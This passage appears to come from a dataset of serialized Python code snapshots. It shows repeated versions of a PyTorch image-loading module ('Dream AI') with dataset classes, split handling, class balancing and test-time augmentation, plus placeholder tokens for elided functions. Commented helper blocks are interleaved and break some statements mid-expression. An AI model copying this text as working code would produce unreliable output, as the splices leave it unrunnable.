std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = 
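# Hedged end-to-end usage sketch. 'my_data' and its layout
# (my_data/train/<class>/<images>) are illustrative assumptions only.
# set_up_data() writes train/val/test CSVs, then get_data() builds the
# datasets and loaders keyed by the split names.
import os

if os.path.isdir('my_data'):
    dp = DataProcessor(data_path='my_data')      # setup_data=True by default
    _, loaders, sizes = dp.get_data(s=(224, 224), bs=32)
    xb, yb = next(iter(loaders['train']))
# Caution: show_data() calls self.get_data(size, bs) positionally, which
# binds size to get_data's first parameter (data_dict); keyword arguments,
# as above, avoid that mismatch.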
obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, 
tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label 
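# one_hot() is elided in this dump (<function token> in later steps); the
# sketch below is an assumed reconstruction consistent with its call sites,
# which expect a 0/1 matrix plus the ordered class vocabulary. The
# multi_label flag is accepted for signature parity only.
import numpy as np

def one_hot_sketch(label_lists, multi_label=True):
    classes = np.unique([l for row in label_lists for l in row])  # sorted
    out = np.zeros((len(label_lists), len(classes)), dtype=np.float32)
    for i, row in enumerate(label_lists):
        for l in row:
            out[i, np.searchsorted(classes, l)] = 1.0
    return out, classes

onehot, vocab = one_hot_sketch([[0, 2], [1], [0, 1, 2]])
print(vocab, onehot)   # [0 1 2]; rows [[1,0,1],[0,1,0],[1,1,1]]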
Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n 
Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, 
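# The tta pipeline above emits a (ncrops, C, H, W) tensor per sample, so a
# batch arrives as (bs, ncrops, C, H, W). Standard five-crop inference fuses
# the crop axis into the batch, runs the model once, and averages the
# per-crop outputs; model is any callable nn.Module here.
import torch

def fivecrop_predict(model, batch):              # batch: (bs, ncrops, C, H, W)
    bs, ncrops, c, h, w = batch.size()
    out = model(batch.view(-1, c, h, w))         # (bs * ncrops, num_classes)
    return out.view(bs, ncrops, -1).mean(dim=1)  # average over the 5 crops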
bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n <function token>\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, 
self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) 
for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = 
{self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, 
